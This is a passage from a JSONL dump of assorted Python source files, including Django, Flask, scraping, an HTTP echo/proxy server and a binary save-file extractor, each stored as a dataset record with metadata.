os.remove(cfgfile)\n\n return output, error\n\n\ndef validate_host_shape(df: pd.DataFrame, ns_dict: dict):\n '''For the given DF, validate that the number of hosts is accurate'''\n for ns in ns_dict:\n if ns in df.namespace.unique():\n assert df.query(\n f'namespace == \"{ns}\"').hostname.nunique() == ns_dict[ns]\n","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":7076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"586526452","text":"import sys\nimport os\n\nif 
os.path.isdir('library'):\n sys.path.insert(0, os.getcwd() + '/library')\n\nimport logging\nimport re\nimport random\nimport json\n\n# pip packages\nimport lxml.html as lh\n\nimport helpers\n\nfrom helpers import get\nfrom website import Website\n\nclass Dicom:\n def getInformation(self):\n for self.ciodIndex, ciod in enumerate(self.ciods):\n try:\n newItems = self.getCiod(self.ciods[ciod])\n self.output(newItems)\n except Exception as e:\n helpers.handleException(e)\n\n def getCiod(self, ciod):\n results = []\n\n ciodId = get(ciod, 'id')\n\n found = False\n\n self.moduleIndex = 0\n\n # get the things it links to\n for linkToModule in self.ciodToModules:\n if get(linkToModule, 'ciod') == ciodId:\n logging.info(f'CIOD: {self.ciodIndex + 1} of {len(self.ciods)}: {ciodId}. Module: {self.moduleIndex + 1}: {get(linkToModule, \"module\")}.')\n\n self.moduleIndex += 1\n\n newItems = self.getModule(ciod, linkToModule)\n \n results += newItems\n\n found = True\n # reached end of possible results\n elif found:\n break\n\n return results\n\n def getModule(self, ciod, linkToModule):\n results = []\n\n moduleId = get(linkToModule, 'module')\n\n # get the main object\n module = get(self.modules, moduleId)\n \n found = False\n\n # get the things it links to\n for linkToAttribute in self.moduleToAttributes:\n if get(linkToAttribute, 'module') == moduleId:\n self.outputUrl(ciod, linkToAttribute)\n\n newItem = self.getAttribute(ciod, module, linkToAttribute)\n\n if newItem:\n results.append(newItem)\n \n found = True\n # reached end of possible results\n elif found:\n break\n\n return results\n\n def getAttribute(self, ciod, module, linkToAttribute):\n result = {\n 'CIOD': get(ciod, 'name'), \n 'module': get(module, 'name')\n }\n\n tag = get(linkToAttribute, 'tag')\n\n # get the main object\n tag = tag.replace(',', '')\n tag = tag.replace('(', '')\n tag = tag.replace(')', '')\n tag = tag.lower()\n\n attribute = get(self.attributes, tag)\n\n if not attribute:\n return {}\n\n # the keys we want and what name to use for the output\n keys = {\n 'tag_number': 'tag',\n 'tag_keyword': 'keyword',\n 'tag_value_multiplicity': 'valueMultiplicity',\n 'tag_value_representation': 'valueRepresentation'\n }\n\n for key in keys:\n result[key] = get(attribute, keys[key])\n\n # add the name\n if key == 'tag_value_representation':\n result[key] = f'{get(self.valueRepresentations, result[key])} ({result[key]})' \n elif key == 'tag_keyword':\n\n result[key] = self.getKeywordString(linkToAttribute)\n \n # to keep the right order of columns in the output file\n # add the name \n type = get(linkToAttribute, 'type')\n result['tag_type'] = f'{get(self.types, type)} ({type})'\n\n website = Website()\n html = get(linkToAttribute, 'description')\n plainText = website.getXpath(html, \".\", True)\n plainText = plainText.strip()\n\n result['tag_description'] = plainText\n result['tag_description_code_dict'] = self.getCodeDictionary(ciod, module, linkToAttribute, attribute)\n\n return result\n\n def getKeywordString(self, linkToAttribute):\n result = 'ds.'\n\n moduleId = get(linkToAttribute, 'module')\n \n path = get(linkToAttribute, 'path')\n path = path.replace(moduleId + ':', '')\n\n parts = path.split(':')\n\n newParts = []\n\n for i, part in enumerate(parts):\n attribute = get(self.attributes, part)\n\n if not attribute:\n continue\n\n newPart = get(attribute, 'keyword')\n\n newParts.append(newPart)\n\n result += '[0].'.join(newParts)\n\n return result\n\n def getCodeDictionary(self, ciod, module, linkToAttribute, attribute):\n result 
= {}\n \n for externalReference in get(linkToAttribute, 'externalReferences'):\n referenceUrl = get(externalReference, 'sourceUrl')\n\n reference = get(self.references, referenceUrl)\n\n # parse the html\n website = Website()\n\n # get the terms tables \n elements = website.getXpath(reference, \"//dl[../p/strong/text() = 'Defined Terms:' or ../p/strong/text() = 'Enumerated Values:']\")\n\n for element in elements:\n terms = website.getXpathInElement(element, \"//dt\")\n definitions = website.getXpathInElement(element, \"//dd\")\n\n # pairs of dt and dd tags\n for i, term in enumerate(terms):\n if i >= len(definitions):\n break\n\n term = term.text_content().strip()\n definition = definitions[i].text_content().strip()\n \n result[term] = definition\n\n if str(result) == \"{'DCMR': 'DICOM Content Mapping Resource', 'SDM': 'SNOMED DICOM Microglossary (Retired)'}\":\n result = ''\n\n return result\n\n def output(self, newItems):\n if not newItems:\n return\n\n fields = []\n\n for key in newItems[0]:\n fields.append(key)\n\n if not os.path.exists(self.outputFile):\n helpers.toFile(','.join(fields), self.outputFile)\n\n logging.info(f'Writing results {self.outputFile}')\n \n for i, item in enumerate(newItems):\n\n line = []\n\n for key in fields:\n line.append(get(item, key))\n\n helpers.appendCsvFile(line, self.outputFile)\n\n def outputUrl(self, ciod, linkToAttribute):\n ciodId = get(ciod, 'id')\n \n path = get(linkToAttribute, 'path')\n path = path.replace(':', '/')\n\n url = f'https://dicom.innolitics.com/ciods/{ciodId}/{path}'\n\n helpers.appendToFile(url, self.urlListFile)\n\n def getJsonFile(self, fileName):\n if not '/' in fileName:\n fileName = os.path.join(self.options['inputDirectory'], fileName)\n\n file = helpers.getFile(fileName)\n \n return json.loads(file)\n\n def __init__(self, options):\n self.options = options\n\n # top level\n self.ciods = self.getJsonFile('ciods.json')\n\n # link to second level\n self.ciodToModules = self.getJsonFile('ciod_to_modules.json')\n\n # second level\n self.modules = self.getJsonFile('modules.json')\n\n # link to third level\n self.moduleToAttributes = self.getJsonFile('module_to_attributes.json')\n \n # link to third level\n self.attributes = self.getJsonFile('attributes.json')\n\n # detailed description for an attribute\n self.references = self.getJsonFile('references.json')\n\n self.types = self.getJsonFile('resources/tag-types.json')\n\n self.valueRepresentations = self.getJsonFile('resources/tag-value-representations.json')\n\n self.outputFile = os.path.join('output', 'results.csv')\n self.urlListFile = os.path.join('output', 'urls.csv') \n \n helpers.makeDirectory('output')\n \n helpers.removeFile(self.outputFile)\n helpers.removeFile(self.urlListFile)\n\nclass Main:\n def run(self):\n self.dicom.getInformation()\n self.cleanUp()\n\n def cleanUp(self):\n logging.info('Done')\n\n def __init__(self):\n helpers.setUpLogging()\n \n logging.info('Starting')\n\n self.options = {\n 'inputDirectory': 'input'\n }\n\n # read the options file\n helpers.setOptions('options.ini', self.options)\n\n self.dicom = Dicom(self.options)\n\nmain = Main()\nmain.run()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"10603223","text":"import os\nimport glob\nimport cv2\nimport json\n\nfrom coords import toInt\nfrom dataset import *\n\ndataset_path = 'dataset_actual/'\n\nimage_filenames = 
get_image_filenames(dataset_path)\nannotation_filenames = get_annotation_filenames(image_filenames)\ncolor_map = get_colors(dataset_path)\n\nprint('Imgs found: ' + str(len(image_filenames)))\n\nfor img_fname, ann_fname in zip(image_filenames, annotation_filenames):\n with open(ann_fname) as f:\n img = cv2.imread(img_fname)\n for obj in json.load(f)['objects']:\n class_title = obj['classTitle']\n pts = obj['points']['exterior']\n pts = [tuple(toInt(pt)) for pt in pts]\n class_color = color_map[class_title]\n cv2.rectangle(img, pts[0], pts[1], class_color)\n cv2.putText(img, class_title, pts[0], cv2.FONT_HERSHEY_SIMPLEX, 0.7, (255, 255, 255))\n cv2.imshow('img', img)\n if cv2.waitKey(0) == 27:\n exit()","sub_path":"view_annotation.py","file_name":"view_annotation.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"269188351","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('accounts', '0005_auto_20150404_2142'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Asset',\n fields=[\n ('id', models.AutoField(auto_created=True, serialize=False, primary_key=True, verbose_name='ID')),\n ('symbol', models.CharField(max_length=10, unique=True)),\n ('description', models.CharField(max_length=64)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.RemoveField(\n model_name='holding',\n name='symbol',\n ),\n migrations.AddField(\n model_name='holding',\n name='asset',\n field=models.ForeignKey(to='accounts.Asset', blank=True, null=True),\n preserve_default=True,\n ),\n ]\n","sub_path":"financemanagerapi/accounts/migrations/0006_auto_20150414_0340.py","file_name":"0006_auto_20150414_0340.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"32270746","text":"#!/usr/bin/env python\n\nfrom BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer\nimport StringIO\nimport argparse\nimport logging\nimport os\nimport random\nimport sys\nimport urllib2\n\nlogging.basicConfig()\n\nlogger = logging.getLogger(__name__)\n\nclass EchoHTTPRequestHandler(BaseHTTPRequestHandler):\n def do_HEAD(self):\n self.do_GET(method='HEAD', body=False)\n \n def do_GET(self, method='GET', body=True):\n try:\n try:\n sio = StringIO.StringIO()\n sio.write('====BEGIN REQUEST=====\\n')\n sio.write(self.command)\n sio.write(' ')\n sio.write(self.path)\n sio.write(' ')\n sio.write(self.request_version)\n sio.write('\\n')\n for line in self.headers.headers:\n sio.write(line)\n sio.write('\\n')\n #if self.rfile:\n # sio.write(self.rfile.read())\n sio.write('\\n')\n sio.write('====END REQUEST=======\\n')\n logger.info(sio.getvalue())\n \n self.send_response(200)\n self.send_header('Content-Type', 'text/plain')\n self.send_header('Content-Length', str(len(sio.getvalue())))\n self.end_headers()\n if body:\n self.wfile.write(sio.getvalue())\n return\n finally:\n sio.close()\n except IOError:\n self.send_error(404, 'file not found')\n \n\n#\n\nclass ProxyHTTPRequestHandler(BaseHTTPRequestHandler):\n def do_HEAD(self):\n self.do_GET(body=False)\n \n def do_GET(self, body=True):\n sent = False\n try:\n req = None\n resp = None\n sio = StringIO.StringIO()\n try:\n hostname = self.headers.getheader('Host')\n if not hostname:\n hostname = 'localhost'\n url = 'http://{}{}'.format(hostname, self.path)\n 
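# Rebuild the incoming request as an outbound urllib2 request to the\n            # upstream host; the relevant headers are copied onto it below.\n            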
req = urllib2.Request(url=url)\n sio.write('====BEGIN REQUEST=====\\n')\n sio.write(url)\n sio.write('\\n')\n sio.write(self.command)\n sio.write(' ')\n sio.write(self.path)\n sio.write(' ')\n sio.write(self.request_version)\n sio.write('\\n')\n for line in self.headers.headers:\n line_parts = [o.strip() for o in line.split(':', 1)]\n if len(line_parts) == 2:\n if line_parts[0].startswith('X-'):\n pass\n elif line_parts[0] in ('Connection','User-Agent'):\n pass\n else:\n sio.write(line)\n req.add_header(*line_parts)\n sio.write('\\n')\n sio.write('====END REQUEST=======\\n')\n logger.error(sio.getvalue())\n try:\n resp = urllib2.urlopen(req)\n except urllib2.HTTPError as e:\n if e.getcode():\n resp = e\n else:\n self.send_error(599, u'error proxying: {}'.format(unicode(e)))\n sent = True\n return\n self.send_response(resp.getcode())\n respheaders = resp.info()\n for line in respheaders.headers:\n line_parts = line.split(':', 1)\n if len(line_parts) == 2:\n self.send_header(*line_parts)\n self.end_headers()\n sent = True\n if body:\n self.wfile.write(resp.read())\n return\n finally:\n if resp:\n resp.close()\n sio.close()\n except IOError as e:\n if not sent:\n self.send_error(404, 'error trying to proxy: {}'.format(str(e)))\n\ndef parse_args(argv=sys.argv[1:]):\n parser = argparse.ArgumentParser(description='Either Proxy or Echo HTTP requests')\n parser.add_argument('--port', dest='port', type=int, default=random.randint(20000, 60000),\n help='serve HTTP requests on specified port (default: random)')\n parser.add_argument('--type', dest='server_type', choices=['echo', 'proxy'], default='echo',\n help='Whether to run as a proxy server or echo server')\n args = parser.parse_args(argv)\n return args\n\ndef main(argv=sys.argv[1:]):\n args = parse_args(argv)\n print('http server is starting on port {}...'.format(args.port))\n server_address = ('127.0.0.1', args.port)\n if args.server_type == 'proxy':\n httpd = HTTPServer(server_address, ProxyHTTPRequestHandler)\n else:\n httpd = HTTPServer(server_address, EchoHTTPRequestHandler)\n print('http server is running as {}...'.format(args.server_type))\n httpd.serve_forever()\n \nif __name__ == '__main__':\n main()\n","sub_path":"all-gists/6194156/snippet.py","file_name":"snippet.py","file_ext":"py","file_size_in_byte":5140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"66960099","text":"class Gesture:\n\tresults = {}\n\tdef __init__(self):\n\t\tif not Gesture.results:\n\t\t\tself.populate();\n\t\t\n\tdef compare_value(self, left, right):\n\t\tresult = Gesture.results[left][right]\n\t\tif result[0] == 0:\n\t\t\treturn (0, \"It was a draw\")\n\t\telif result[0] == 1:\n\t\t\treturn result\n\t\telse:\n\t\t\treturn (-1, Gesture.results[right][left][1])\n\t\n\tdef populate(self):\n\t\tvalues = Gesture.results\n\t\tvalues[\"rock\"] = {}\n\t\tvalues[\"rock\"][\"rock\"] = (0, \"\")\n\t\tvalues[\"rock\"][\"paper\"] = (-1, \"\")\n\t\tvalues[\"rock\"][\"scissors\"] = (1, \"Rock crushes scissors.\")\n\t\tvalues[\"rock\"][\"lizard\"] = (1, \"Rock crushes lizard.\")\n\t\tvalues[\"rock\"][\"spock\"] = (-1, \"\")\n\t\tvalues[\"paper\"] = {}\n\t\tvalues[\"paper\"][\"rock\"] = (1, \"Paper covers rock.\")\n\t\tvalues[\"paper\"][\"paper\"] = (0, \"\")\n\t\tvalues[\"paper\"][\"scissors\"] = (-1, \"\")\n\t\tvalues[\"paper\"][\"lizard\"] = (-1, \"\")\n\t\tvalues[\"paper\"][\"spock\"] = (1, \"Paper disproves Spock.\")\n\t\tvalues[\"scissors\"] = {}\n\t\tvalues[\"scissors\"][\"rock\"] = (-1, 
\"\")\n\t\tvalues[\"scissors\"][\"paper\"] = (1, \"Scissors cuts paper.\")\n\t\tvalues[\"scissors\"][\"scissors\"] = (0, \"\")\n\t\tvalues[\"scissors\"][\"lizard\"] = (1, \"Scissors decapitates lizard.\")\n\t\tvalues[\"scissors\"][\"spock\"] = (-1, \"\")\t\n\t\tvalues[\"lizard\"] = {}\n\t\tvalues[\"lizard\"][\"rock\"] = (-1, \"\")\n\t\tvalues[\"lizard\"][\"paper\"] = (1, \"Lizard eats paper\")\n\t\tvalues[\"lizard\"][\"scissors\"] = (-1, \"\")\n\t\tvalues[\"lizard\"][\"lizard\"] = (0, \"\")\n\t\tvalues[\"lizard\"][\"spock\"] = (1, \"Lizard poisons Spock\")\t\n\t\tvalues[\"spock\"] = {}\n\t\tvalues[\"spock\"][\"rock\"] = (1, \"Spock vaporizes rock\")\n\t\tvalues[\"spock\"][\"paper\"] = (-1, \"\")\n\t\tvalues[\"spock\"][\"scissors\"] = (1, \"Spock smashes scissors\")\n\t\tvalues[\"spock\"][\"lizard\"] = (-1, \"\")\n\t\tvalues[\"spock\"][\"spock\"] = (0, \"\")\t\n\t\t\t\n\t\t","sub_path":"gesture.py","file_name":"gesture.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"556582742","text":"from django.core.paginator import Paginator, PageNotAnInteger, EmptyPage\nfrom django.shortcuts import render\nfrom django.views.generic import ListView\nfrom math import ceil\nfrom apps.accounts.mixins import JsonResponseMixin\nfrom apps.orders.models import Order, Status\n\n\nclass OrderServiceListView(JsonResponseMixin, ListView):\n\tmodel = Order\n\ttemplate_name = 'orders.html'\n\tpaginate_by = 2\n\n\tdef get(self, request, *args, **kwargs):\n\t\tself.object_list = self.get_queryset()\n\t\treturn self.response_handler()\n\n\tdef get_context_data(self, **kwargs):\n\t\tcontext = super(OrderServiceListView, self).get_context_data(**kwargs)\n\t\tpage = self.request.GET.get('page')\n\t\tcontext.update({'status': Status.objects.all(),\n\t\t 'page': page,\n\t\t 'service_name': self.kwargs.get('service')})\n\t\treturn context\n\n\tdef get_data(self):\n\t\t# Acerca del paginador\n\t\t# https://docs.djangoproject.com/en/1.7/topics/pagination/\n\t\tpaginator = Paginator(self.object_list, self.paginate_by)\n\t\tpage = self.request.GET.get('page')\n\n\t\ttry:\n\t\t\torders = paginator.page(page)\n\t\texcept PageNotAnInteger:\n\t\t\torders = paginator.page(1)\n\t\t\tpage = 1\n\t\texcept EmptyPage:\n\t\t\torders = paginator.page(paginator.num_pages)\n\t\t\tpage = paginator.num_pages\n\n\t\tdata = [{'reference': order.reference,\n\t\t 'description': order.description,\n\t\t 'service': order.service.name,\n\t\t 'date': order.date,\n\t\t 'status': order.status.name\n\t\t } for order in orders.object_list]\n\n\t\tdata.append({'page': page,\n\t\t 'label': str(orders),\n\t\t 'next': orders.has_next(),\n\t\t 'prev': orders.has_previous(),\n\t\t 'base_url': self.request.path,\n\t\t 'page_range': paginator.num_pages})\n\n\t\treturn data\n\n\tdef get_queryset(self):\n\t\tservice_name = self.kwargs['service']\n\n\t\tif self.kwargs.get('status'):\n\t\t\tqueryset = self.model.objects\\\n\t\t\t\t.filter(service__slug=service_name)\\\n\t\t\t\t.filter(status__slug=self.kwargs['status'])\\\n\t\t\t\t.order_by('-date')\n\t\telse:\n\t\t\tqueryset = self.model.objects.filter(service__slug=service_name).order_by('-date')\n\t\treturn queryset","sub_path":"apps/services/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"247775811","text":"import urllib\nimport utils\nfrom BeautifulSoup import BeautifulSoup\n\nclass 
UrhoParser:\n def __init__(self):\n self.song_urls = []\n\n def parse_song_urls(self, url):\n f = urllib.urlopen(url)\n s = f.read()\n f.close()\n soup = BeautifulSoup(s)\n anchors = soup.findAll('a')\n self.song_urls = [ song['href'] for song in anchors if 'href' in song.attrs[0] and song['href'].startswith(\"/UrhoMatti:\") ]\n return self.song_urls\n\n def parse_song_from_url(self, url):\n f = urllib.urlopen(url)\n s = f.read()\n f.close()\n soup = BeautifulSoup(s)\n header = soup.findAll(\"h1\", id=\"firstHeading\")[0].contents[0]\n try:\n lyrics = utils.remove_html_tags(str(soup.find(\"div\", \"lyrics\").contents[1]))\n except AttributeError:\n lyrics = \"Couldn't parse lyrics\"\n\n return [header, lyrics]\n","sub_path":"urhoParser.py","file_name":"urhoParser.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"33274106","text":"# coding:utf-8\nimport xlwt\nimport csv\n\n\ndef check(row):\n\n count = len(row)\n count_t = 0\n\n if not isinstance(row, list):\n return False\n\n for c in row:\n if c == None or c == '':\n count_t += 1\n\n if count_t == count:\n return False\n\n return True\n\ndef covert_csv_to_excel(src, encoding=\"utf-8\"):\n style = xlwt.XFStyle()\n font = xlwt.Font()\n font.name = 'SimSun'\n style.font = font\n workbook = xlwt.Workbook(encoding=encoding)\n worksheet = workbook.add_sheet(\"sheet1\", cell_overwrite_ok=True)\n r = -1\n\n with open(src, 'rb') as f:\n reader = csv.reader(f)\n for _, row in enumerate(reader):\n if check(row):\n r += 1\n else:\n continue\n for c, col in enumerate(row):\n worksheet.write(r, c, col, style)\n workbook.save(src + '.xls')\n\ncovert_csv_to_excel('shdmu.csv')","sub_path":"day2/csv_to_excel.py","file_name":"csv_to_excel.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"186017861","text":"from django.core.management.base import BaseCommand\nfrom django.core.management import call_command\nfrom django.contrib.auth.models import Group, User\n\nfrom faker import Faker\nfrom faker.providers import BaseProvider\nfrom core.models import UrineDrugScreen,Medication,EmployeeRole,Employee,BehavioralHealthNotes\nfrom core.participants.models import Participant, Gender, Race\nfrom core.permissions import CASE_MANAGER, FRONT_DESK, ADMIN\nfrom datetime import datetime, date\nimport random, re\n\nfake = Faker()\n\nDEFAULT_DEV_ENV_PASS = 'password123'\nDEFAULT_GROUPS = [FRONT_DESK, CASE_MANAGER, ADMIN]\n\nclass Command(BaseCommand):\n help = \"seed database for testing and development.\"\n\n def handle(self, *args, **options):\n run_seed(self)\n\n\nclass MedsProvider(BaseProvider):\n __provider__ = \"meds\"\n __lang__ = \"en_US\"\n\n def meds(self):\n meds = [u'film', u'tab', u'vivitrol']\n return random.choices(meds)\n\n\nfake.add_provider(MedsProvider)\n\n\nclass FrequencyProvider(BaseProvider):\n __provider__ = \"frequency\"\n __lang__ = \"en_US\"\n\n def frequency(self):\n frequency = [7, 14, 28, 21, 3]\n return random.choices(frequency)\n\n\nfake.add_provider(FrequencyProvider)\n\ndef run_seed(self):\n call_command('migrate')\n call_command('flush')\n create_groups()\n create_users()\n add_users_to_groups()\n create_participants()\n\ndef create_users(output=True):\n for group in DEFAULT_GROUPS:\n email = \"{}@{}.com\".format(group, group)\n u = User.objects.create_user(username=group, email=email)\n u.set_password(DEFAULT_DEV_ENV_PASS)\n\n if group == 
ADMIN:\n            u.is_superuser = True\n            u.is_staff = True\n\n        u.save()\n\n        if output:\n            print(\"Created user: {}\".format(email))\n\ndef create_groups(output=True):\n    for group in DEFAULT_GROUPS:\n        Group.objects.get_or_create(name=group)\n        if output:\n            print(\"Created group: {}\".format(group))\n\ndef add_users_to_groups(output=True):\n    \"\"\"\n    adds user to group of same name\n    \"\"\"\n\n    for group in DEFAULT_GROUPS:\n        user = User.objects.get(username=group)\n        role_title = Group.objects.get(name=group)\n        user.groups.add(role_title)\n\ndef create_participants():\n    gender_list = list(Gender)\n    race_list = list(Race)\n\n    for _ in range(10):\n        last_four = fake.ssn(taxpayer_identification_number_type=\"SSN\")[-4:]\n        profile = fake.profile()\n        gender = random.choice(gender_list)\n        race = random.choice(race_list)\n\n        participant = Participant(\n            first_name=fake.first_name(),\n            last_name=fake.last_name(),\n            pp_id=\"todo\",\n            gender=gender.value,\n            race=race.value,\n            last_four_ssn=last_four,\n            date_of_birth=profile['birthdate'],\n            start_date=fake.date_time(),\n        )\n        participant.full_clean()\n        participant.save()\n        create_uds_results(participant)\n        create_medication(participant)\n\ndef random_bool():\n    return bool(random.getrandbits(1))\n\ndef create_medication(participant):\n    meds = Medication(\n        participant=participant,\n        medication_name=fake.meds()[0],\n        ingestion_frequency=fake.frequency()[0],\n        medical_delivery=fake.sentence(nb_words=3, variable_nb_words=True, ext_word_list=None)\n    )\n    meds.full_clean()\n    meds.save()\n\ndef create_uds_results(participant):\n    for _ in range(random.randint(2,10)):\n        test_date = fake.date_time_between(start_date=participant.start_date, end_date='+5y')\n\n        uds = UrineDrugScreen(\n            participant=participant,\n            uds_temp=random.randint(85,105),\n            date_of_test=test_date,\n            pregnancy_test=random_bool(),\n            opiates=random_bool(),\n            fentanyl=random_bool(),\n            bup=random_bool(),\n            coc=random_bool(),\n            amp=random_bool(),\n            m_amp=random_bool(),\n            thc=random_bool(),\n            mtd=random_bool(),\n            pcp=random_bool(),\n            bar=random_bool(),\n            bzo=random_bool(),\n            tca=random_bool(),\n            oxy=random_bool(),\n        )\n\n        uds.full_clean()\n        uds.save()\n\n","sub_path":"core/management/commands/seed.py","file_name":"seed.py","file_ext":"py","file_size_in_byte":4335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"651070301","text":"\"\"\"\nAuthor: Sandeep Shenoy sandeepjshenoy@gmail.com\n\"\"\"\n\n\ndef rle(A):\n    N = len(A)\n    if N <= 2:\n        return None\n    m = N - 2\n    for t in range(m, 1, -1):\n        i = 0\n        # print(\"%d\" %t)\n        while t + i < N - 1:\n            print_rle(A, i, t, N)\n            #print(A[0:i+1] + str(t) + A[t + i + 1: N])\n            i += 1\n\n\ndef print_rle(A, i, t, N):\n    # print the prefix A[0..i], the run length t, then the tail A[t+i+1..N-1];\n    # a fresh loop variable keeps the parameter i from being clobbered\n    for j in range(0, i + 1):\n        print(\"%s\" % A[j], end=\"\")\n    print(\"%s\" % t, end=\"\")\n    for j in range(t + i + 1, N):\n        print(\"%s\" % A[j], end=\"\")\n    print(\"\")\n\n\ndef main():\n    A = 'abcdefghi'\n    rle(A)\n\n\nif __name__ == \"__main__\":\n    main()","sub_path":"IK/Strings/RLE.py","file_name":"RLE.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"21680725","text":"from flask import Flask, request, render_template\r\nimport pandas as pd\r\n\r\n\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom sklearn.metrics.pairwise import sigmoid_kernel\r\n\r\n# def get_info(c_name):\r\n#     xl = pd.ExcelFile('data_for_content_based - Ext.xlsx')\r\n#     df = xl.parse('Sheet1')\r\n    \r\n#     rslt_df = df[df['Name'] == 
c_name].Overview.to_string()\r\n\r\n#     return rslt_df\r\n    \r\n\r\ndef give_rec(title):\r\n    \r\n    cleaned_df = pd.read_csv('cleaneddf.csv', index_col=0)\r\n    \r\n    tfv = TfidfVectorizer(min_df=3, max_features=None, \r\n            strip_accents='unicode', analyzer='word',token_pattern=r'\\w{1,}',\r\n            ngram_range=(1, 3),\r\n            stop_words = 'english')\r\n    \r\n    # Filling NaNs with empty string\r\n    cleaned_df['Overview'] = cleaned_df['Overview'].fillna('')\r\n    \r\n    # Fitting the TF-IDF on the 'Overview' text\r\n    tfv_matrix = tfv.fit_transform(cleaned_df['Overview'])\r\n    \r\n    # Compute the sigmoid kernel\r\n    sig = sigmoid_kernel(tfv_matrix, tfv_matrix)\r\n    \r\n    \r\n    # Reverse mapping of indices and company names\r\n    indices = pd.Series(cleaned_df.index, index=cleaned_df['Name']).drop_duplicates()\r\n\r\n    # Get the index corresponding to the requested company\r\n    idx = indices[title]\r\n\r\n    # Get the pairwise similarity scores \r\n    sig_scores = list(enumerate(sig[idx]))\r\n\r\n    # Sort the Companies \r\n    sig_scores = sorted(sig_scores, key=lambda x: x[1], reverse=True)\r\n\r\n    # Scores of the 10 most similar Companies\r\n    sig_scores = sig_scores[1:11]\r\n\r\n    # Company indices\r\n    company_indices = [i[0] for i in sig_scores]\r\n\r\n    # Top 10 most similar Companies\r\n    a = cleaned_df['Name'].iloc[company_indices] + ', ' + cleaned_df['Location'].iloc[company_indices]\r\n    arr = a.tolist()\r\n    return arr\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route('/')\r\ndef home():\r\n    return render_template('home.html')\r\n\r\n@app.route('/recommend', methods=['POST'])\r\ndef recommend():\r\n    '''\r\n    For rendering results on HTML GUI\r\n    '''\r\n    c_name = request.form['c_name']\r\n    model = give_rec(c_name)\r\n    # info = get_info(c_name)\r\n    return render_template('recommend.html',c_name=c_name,r=model)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    app.run(debug=True)\r\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"368468152","text":"# coding: utf-8\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport binascii\nimport codecs\nimport struct\nimport sys\nimport Common\n\n\ndef syntax():\n    print(\"Syntax: ExtractPowersave.py input.bin [-r rawdata.raw] [-n]\")\n    print(\" input.bin : File from which to extract raw data\")\n    print(\" -r rawdata.raw : File to write the raw data\")\n    print(\" -n : Display the display name of the powersave\")\n    print(\" At least one of the two options is required.\")\n    return 1\n\n\nclass ExtractPowersave:\n    \"\"\"\n    This class permits the extraction of the raw data from a Powersave\n    file to a raw-data file.\n    \"\"\"\n\n    def __init__(self, powersave_file, row_file=None):\n        \"\"\"\n        Create a new Extract Powersave file utility instance.\n\n        :param powersave_file:\n            File from which to extract raw data.\n        :type powersave_file: str\n        :param row_file:\n            File to write the raw data (Optional).\n            If it's not defined, only the display name of the\n            file is extracted and returned.\n        :type row_file: str\n        \"\"\"\n        self.powersave_file = powersave_file\n        self.row_file = row_file\n\n    def extract(self):\n        \"\"\"\n        Extract the raw data from 
powersave_file and return the display name\n        of the powersave file.\n\n        :return: The display name of the powersave file.\n        :rtype: str\n\n        :raises IOError:\n        \"\"\"\n\n        with open(self.powersave_file, \"rb\") as infile:\n            header = b\"\"\n\n            header += infile.read(0x14 - len(header))\n            if len(header) != 0x14:\n                raise IOError(\"Powersave format error : header size\")\n\n            computedHeaderCRC32 = Common.datel_crc32(header + Common.encode_dword(0))\n\n            readHeaderCRC32 = infile.read(4)\n            if len(readHeaderCRC32) != 4:\n                raise IOError(\"Powersave format error : CRC32 size\")\n\n            readHeaderCRC32 = Common.decode_dword(readHeaderCRC32)[0]\n\n            if computedHeaderCRC32 != readHeaderCRC32:\n                raise IOError('Unverified Header CRC32')\n\n            readPayloadCRC32 = infile.read(4)\n            if len(readPayloadCRC32) != 4:\n                raise IOError(\"Powersave format error : Payload CRC32\")\n            readPayloadCRC32 = Common.decode_dword(readPayloadCRC32)[0]\n\n            description = b\"\"\n            while len(description) != 0x40 * 2:\n                readData = infile.read(0x40 * 2 - len(description))\n                if not readData:\n                    # read() returns b'' at EOF; comparing against a str never matched\n                    break\n                description += readData\n\n            if len(description) != 0x40 * 2:\n                raise IOError(\"Powersave format error : display name invalid\")\n\n            # The description is little-endian UTF-16.\n            description = codecs.decode(description, \"utf-16le\")\n\n            try:\n                index = description.index(\"\\\\0\")\n                description = description[:index]\n            except ValueError:\n                pass\n\n            if self.row_file is not None:\n                computedPayloadCRC32 = b''\n                with open(self.row_file, \"wb\") as outfile:\n                    # Calculate Datel-CRC32 of payload.\n                    computedPayloadCRC32 = 